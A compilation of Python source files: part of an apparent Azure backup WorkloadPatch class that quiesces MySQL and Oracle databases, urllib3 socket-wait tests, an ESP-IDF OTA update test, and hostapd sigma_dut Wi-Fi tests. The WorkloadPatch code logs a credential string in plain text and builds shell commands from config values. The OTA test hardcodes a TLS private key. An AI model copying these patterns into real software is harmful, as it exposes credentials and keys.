self.logger.log("WorkloadPatch: pre connection still running. Sending kill signal")
self.child[0].kill()
if 'mysql' in self.name.lower():
if len(self.child) == 0:
self.logger.log("WorkloadPatch: Not app consistent backup")
self.error_details.append("not app consistent")
elif self.child[0].poll() is None:
self.logger.log("WorkloadPatch: pre connection still running. Sending kill signal")
self.child[0].kill()
self.logger.log("WorkloadPatch: Create connection string for post master")
postscript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/postMysqlSlave.sql")
args = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" < "+postscript
self.logger.log("WorkloadPatch: command to execute: "+str(args))
post_child = subprocess.Popen(args,stdout=subprocess.PIPE,stdin=subprocess.PIPE,shell=True,stderr=subprocess.PIPE)
elif 'oracle' in self.name.lower():
postOracleStatus = self.databaseStatus()
if postOracleStatus != preOracleStatus:
self.logger.log("WorkloadPatch: Error. Pre and post database status different.")
if "OPEN" in str(postOracleStatus):
self.logger.log("WorkloadPatch: Post- Database is open")
else:
self.logger.log("WorkloadPatch: Post- Database not open. Backup may proceed without pre and post")
return
self.logger.log("WorkloadPatch: Post- Inside oracle post")
if preDaemonThread.isAlive():
self.logger.log("WorkloadPatch: Post- Timeout daemon still in sleep")
self.logger.log("WorkloadPatch: Post- Initiating Post Script")
daemonProcess.terminate()
else:
self.logger.log("WorkloadPatch: Post error- Timeout daemon executed before post")
return
postOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/postOracleMaster.sql ")
args = [self.sudo_user, postOracle]
process = subprocess.Popen(args)
while process.poll()==None:
sleep(1)
self.logger.log("WorkloadPatch: Post- Completed")
self.callLogbackup()
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def preMasterDB(self):
pass
def preSlaveDB(self):
pass
def postMasterDB(self):
pass
def postSlaveDB(self):
pass
def confParser(self):
self.logger.log("WorkloadPatch: Entering workload config parsing")
configfile = '/etc/azure/workload.conf'
try:
if os.path.exists(configfile):
config = ConfigParsers.ConfigParser()
config.read(configfile)
if config.has_section("workload"):
self.logger.log("WorkloadPatch: config section present for workloads ")
if config.has_option("workload", 'workload_name'):
self.name = config.get("workload", 'workload_name')
self.logger.log("WorkloadPatch: config workload command "+ self.name)
else:
return None
if config.has_option("workload", 'command_path'):
self.command = config.get("workload", 'command_path')
self.logger.log("WorkloadPatch: config workload command "+ self.command)
if config.has_option("workload", 'credString'):
self.cred_string = config.get("workload", 'credString')
self.logger.log("WorkloadPatch: config workload cred_string "+ self.cred_string)
elif not config.has_option("workload", 'linux_user'):
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadAuthorizationMissing, "Cred and linux user string missing"))
if config.has_option("workload", 'role'):
self.role = config.get("workload", 'role')
self.logger.log("WorkloadPatch: config workload role "+ self.role)
if config.has_option("workload", 'enforceSlaveOnly'):
self.enforce_slave_only = config.get("workload", 'enforceSlaveOnly')
self.logger.log("WorkloadPatch: config workload enforce_slave_only "+ self.enforce_slave_only)
if config.has_option("workload", 'ipc_folder'):
self.ipc_folder = config.get("workload", 'ipc_folder')
self.logger.log("WorkloadPatch: config ipc folder "+ self.ipc_folder)
if config.has_option("workload", 'timeout'):
self.timeout = config.get("workload", 'timeout')
self.logger.log("WorkloadPatch: config timeout of pre script "+ self.timeout)
if config.has_option("workload", 'linux_user'):
linux_user = config.get("workload", 'linux_user')
self.logger.log("WorkloadPatch: config linux user of pre script "+ linux_user)
self.sudo_user = "sudo -u "+linux_user
if config.has_option("workload", 'dbnames'):
dbnames_list = config.get("workload", 'dbnames') #mydb1;mydb2;mydb3
self.dbnames = dbnames_list.split(';')
if config.has_section("logbackup"):
self.logbackup = "enable"
self.logger.log("WorkloadPatch: Logbackup Enabled")
else:
self.logger.log("WorkloadPatch: workload config section missing. File system consistent backup")
else:
self.logger.log("WorkloadPatch: workload config file missing. File system consistent backup")
except Exception as e:
self.logger.log("WorkloadPatch: exception in workload conf file parsing")
if(self.name != None):
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadConfParsingError, "exception in workloadconfig parsing"))
def populateErrors(self):
if len(self.error_details) > 0:
errdetail = self.error_details[0]
return errdetail
else:
return None
def waitForPreScriptCompletion(self):
if self.ipc_folder != None:
wait_counter = 5
while len(self.child) == 0 and wait_counter > 0:
self.logger.log("WorkloadPatch: child not created yet", True)
wait_counter -= 1
sleep(2)
if wait_counter > 0:
self.logger.log("WorkloadPatch: sql subprocess Created "+str(self.child[0].pid))
else:
self.logger.log("WorkloadPatch: sql connection failed")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadConnectionError, "sql connection failed"))
return None
wait_counter = 60
while os.path.exists(self.outfile) == False and wait_counter > 0:
self.logger.log("WorkloadPatch: Waiting for sql to complete")
wait_counter -= 1
sleep(2)
if wait_counter > 0:
self.logger.log("WorkloadPatch: pre at server level completed")
else:
self.logger.log("WorkloadPatch: pre failed to quiesce")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadQuiescingError, "pre failed to quiesce"))
return None
def timeoutDaemon(self):
global preDaemonThread
if 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Inside oracle condition in timeout daemon")
preDaemonOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/preOracleDaemon.sql ") + self.timeout
argsDaemon = [self.sudo_user, preDaemonOracle]
preDaemonThread = threading.Thread(target=self.threadForTimeoutDaemon, args=[argsDaemon])
preDaemonThread.start()
self.logger.log("WorkloadPatch: timeoutDaemon started for: " + self.timeout + " seconds")
def threadForTimeoutDaemon(self, args):
global daemonProcess
daemonProcess = subprocess.Popen(args)
self.logger.log("WorkloadPatch: daemonProcess started")
wait_counter = self.timeout
while daemonProcess.poll() == None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.logger.log("WorkloadPatch: daemonProcess completed")
def workloadStatus(self):
if 'oracle' in self.name.lower():
statusArgs = self.sudo_user + " " +"'" + self.command + "sqlplus" +" -s / as sysdba<<-EOF\nSELECT STATUS FROM V\$INSTANCE;\nEOF'"
oracleStatus = subprocess.check_output(statusArgs, shell=True)
self.logger.log("WorkloadPatch: workloadStatus- " + str(oracleStatus))
return oracleStatus
return "NOT APPLY"
def thread_for_sql(self,args):
self.logger.log("WorkloadPatch: command to execute: "+str(args))
self.child.append(subprocess.Popen(args,stdout=subprocess.PIPE,stdin=subprocess.PIPE,shell=True,stderr=subprocess.PIPE))
sleep(1)
def getRole(self):
return "master"
def callLogBackup(self):
if 'enable' in self.logbackup.lower():
self.logger.log("WorkloadPatch: Initializing logbackup")
logbackupObject = LogBackupPatch()
else:
return
|
test_wait.py
|
import signal
import threading
import time
from socket import socket, socketpair
from types import FrameType
from typing import Any, Callable, Generator, List, Optional, Tuple
import pytest
from urllib3.util.wait import (
_have_working_poll,
poll_wait_for_socket,
select_wait_for_socket,
wait_for_read,
wait_for_socket,
wait_for_write,
)
TYPE_SOCKET_PAIR = Tuple[socket, socket]
TYPE_WAIT_FOR = Callable[..., bool]
@pytest.fixture
def spair() -> Generator[TYPE_SOCKET_PAIR, None, None]:
a, b = socketpair()
yield a, b
a.close()
b.close()
variants: List[TYPE_WAIT_FOR] = [wait_for_socket, select_wait_for_socket]
if _have_working_poll():
variants.append(poll_wait_for_socket)
@pytest.mark.parametrize("wfs", variants)
def test_wait_for_socket(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
with pytest.raises(RuntimeError):
wfs(a, read=False, write=False)
assert not wfs(a, read=True, timeout=0)
assert wfs(a, write=True, timeout=0)
b.send(b"x")
assert wfs(a, read=True, timeout=0)
assert wfs(a, read=True, timeout=10)
assert wfs(a, read=True, timeout=None)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wfs(a, write=True, timeout=0)
# But if we ask for read-or-write, that succeeds
assert wfs(a, read=True, write=True, timeout=0)
# Unless we read from it
assert a.recv(1) == b"x"
assert not wfs(a, read=True, write=True, timeout=0)
# But if the remote peer closes the socket, then it becomes readable
b.close()
assert wfs(a, read=True, timeout=0)
# Waiting for a socket that's actually been closed is just a bug, and
# raises some kind of helpful exception (exact details depend on the
# platform).
with pytest.raises(Exception):
wfs(b, read=True)
def test_wait_for_read_write(spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
assert not wait_for_read(a, 0)
assert wait_for_write(a, 0)
b.send(b"x")
assert wait_for_read(a, 0)
assert wait_for_write(a, 0)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wait_for_write(a, 0)
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: Optional[FrameType]) -> Any:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
wfs(a, read=True, timeout=1)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_zero_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: Optional[FrameType]) -> Any:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
try:
# Start delivering SIGALRM 1000 times per second,
# to trigger race conditions such as
# https://github.com/urllib3/urllib3/issues/1396.
signal.setitimer(signal.ITIMER_REAL, 0.001, 0.001)
# Hammer the system call for a while to trigger the
# race.
for i in range(100000):
wfs(a, read=True, timeout=0)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_infinite_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: Optional[FrameType]) -> Any:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
def make_a_readable_after_one_second() -> None:
time.sleep(1)
b.send(b"x")
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
thread = threading.Thread(target=make_a_readable_after_one_second)
thread.start()
wfs(a, read=True)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
thread.join()
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
|
example_test.py
|
import re
import os
import sys
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
try:
import IDF
except ImportError:
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
# parser = argparse.ArgumentParser()
# parser.add_argument('-p', '--port', dest='port', type= int,
# help= "Server Port", default= 8000)
# args = parser.parse_args()
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("simple_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
test_sigma_dut.py
|
# Test cases for sigma_dut
# Copyright (c) 2017, Qualcomm Atheros, Inc.
# Copyright (c) 2018-2019, The Linux Foundation
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import errno
import fcntl
import hashlib
import logging
logger = logging.getLogger()
import os
import socket
import struct
import subprocess
import threading
import time
import hostapd
from utils import *
from hwsim import HWSimRadio
import hwsim_utils
from wlantest import Wlantest
from tshark import run_tshark
from test_dpp import check_dpp_capab, update_hapd_config, wait_auth_success
from test_suite_b import check_suite_b_192_capa, suite_b_as_params, suite_b_192_rsa_ap_params
from test_ap_eap import check_eap_capa, int_eap_server_params, check_domain_match, check_domain_suffix_match
from test_ap_hs20 import hs20_ap_params
from test_ap_pmf import check_mac80211_bigtk
from test_ocv import check_ocv_failure
def check_sigma_dut():
if not os.path.exists("./sigma_dut"):
raise HwsimSkip("sigma_dut not available")
def to_hex(s):
return binascii.hexlify(s.encode()).decode()
def from_hex(s):
return binascii.unhexlify(s).decode()
def sigma_log_output(cmd):
try:
out = cmd.stdout.read()
if out:
logger.debug("sigma_dut stdout: " + str(out.decode()))
except IOError as e:
if e.errno != errno.EAGAIN:
raise
try:
out = cmd.stderr.read()
if out:
logger.debug("sigma_dut stderr: " + str(out.decode()))
except IOError as e:
if e.errno != errno.EAGAIN:
raise
sigma_prog = None
def sigma_dut_cmd(cmd, port=9000, timeout=2):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.settimeout(timeout)
addr = ('127.0.0.1', port)
sock.connect(addr)
sock.send(cmd.encode() + b"\r\n")
try:
res = sock.recv(1000).decode()
running = False
done = False
for line in res.splitlines():
if line.startswith("status,RUNNING"):
running = True
elif line.startswith("status,INVALID"):
done = True
elif line.startswith("status,ERROR"):
done = True
elif line.startswith("status,COMPLETE"):
done = True
if running and not done:
# Read the actual response
res = sock.recv(1000).decode()
except:
res = ''
pass
sock.close()
res = res.rstrip()
logger.debug("sigma_dut: '%s' --> '%s'" % (cmd, res))
global sigma_prog
if sigma_prog:
sigma_log_output(sigma_prog)
return res
def sigma_dut_cmd_check(cmd, port=9000, timeout=2):
res = sigma_dut_cmd(cmd, port=port, timeout=timeout)
if "COMPLETE" not in res:
raise Exception("sigma_dut command failed: " + cmd)
return res
def start_sigma_dut(ifname, hostapd_logdir=None, cert_path=None,
bridge=None, sae_h2e=False, owe_ptk_workaround=False):
check_sigma_dut()
cmd = ['./sigma_dut',
'-d',
'-M', ifname,
'-S', ifname,
'-F', '../../hostapd/hostapd',
'-G',
'-w', '/var/run/wpa_supplicant/',
'-j', ifname]
if hostapd_logdir:
cmd += ['-H', hostapd_logdir]
if cert_path:
cmd += ['-C', cert_path]
if bridge:
cmd += ['-b', bridge]
if sae_h2e:
cmd += ['-2']
if owe_ptk_workaround:
cmd += ['-3']
sigma = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
for stream in [sigma.stdout, sigma.stderr]:
fd = stream.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
global sigma_prog
sigma_prog = sigma
res = None
for i in range(20):
try:
res = sigma_dut_cmd("HELLO")
break
except:
time.sleep(0.05)
if res is None or "errorCode,Unknown command" not in res:
raise Exception("Failed to start sigma_dut")
return {'cmd': sigma, 'ifname': ifname}
def stop_sigma_dut(sigma):
global sigma_prog
sigma_prog = None
cmd = sigma['cmd']
sigma_log_output(cmd)
logger.debug("Terminating sigma_dut process")
cmd.terminate()
cmd.wait()
out, err = cmd.communicate()
logger.debug("sigma_dut stdout: " + str(out.decode()))
logger.debug("sigma_dut stderr: " + str(err.decode()))
subprocess.call(["ip", "addr", "del", "dev", sigma['ifname'],
"127.0.0.11/24"],
stderr=open('/dev/null', 'w'))
def sigma_dut_wait_connected(ifname):
for i in range(50):
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
break
time.sleep(0.2)
if i == 49:
raise Exception("Connection did not complete")
def test_sigma_dut_basic(dev, apdev):
"""sigma_dut basic functionality"""
sigma = start_sigma_dut(dev[0].ifname)
tests = [("ca_get_version", "status,COMPLETE,version,1.0"),
("device_get_info", "status,COMPLETE,vendor"),
("device_list_interfaces,interfaceType,foo", "status,ERROR"),
("device_list_interfaces,interfaceType,802.11",
"status,COMPLETE,interfaceType,802.11,interfaceID," + dev[0].ifname)]
try:
res = sigma_dut_cmd("UNKNOWN")
if "status,INVALID,errorCode,Unknown command" not in res:
raise Exception("Unexpected sigma_dut response to unknown command")
for cmd, response in tests:
res = sigma_dut_cmd(cmd)
if response not in res:
raise Exception("Unexpected %s response: %s" % (cmd, res))
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_open(dev, apdev):
"""sigma_dut controlled open network association"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
hapd = hostapd.add_ap(apdev[0], {"ssid": "open"})
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_encryption,interface,%s,ssid,%s,encpType,none" % (ifname, "open"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "open"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf(dev, apdev):
"""sigma_dut controlled PSK+PMF association"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "test-pmf-required", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf_bip_cmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-128"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-128", "AES-128-CMAC")
def test_sigma_dut_psk_pmf_bip_cmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-256"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-256", "BIP-CMAC-256")
def test_sigma_dut_psk_pmf_bip_gmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-128"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-128", "BIP-GMAC-128")
def test_sigma_dut_psk_pmf_bip_gmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "BIP-GMAC-256")
def test_sigma_dut_psk_pmf_bip_gmac_256_mismatch(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256 mismatch"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "AES-128-CMAC",
failure=True)
def run_sigma_dut_psk_pmf_cipher(dev, apdev, sigma_cipher, hostapd_cipher,
failure=False):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params["group_mgmt_cipher"] = hostapd_cipher
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,GroupMgntCipher,%s" % (ifname, "test-pmf-required", "12345678", sigma_cipher))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"),
timeout=2 if failure else 10)
if failure:
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Connection reported")
else:
sigma_dut_wait_connected(ifname)
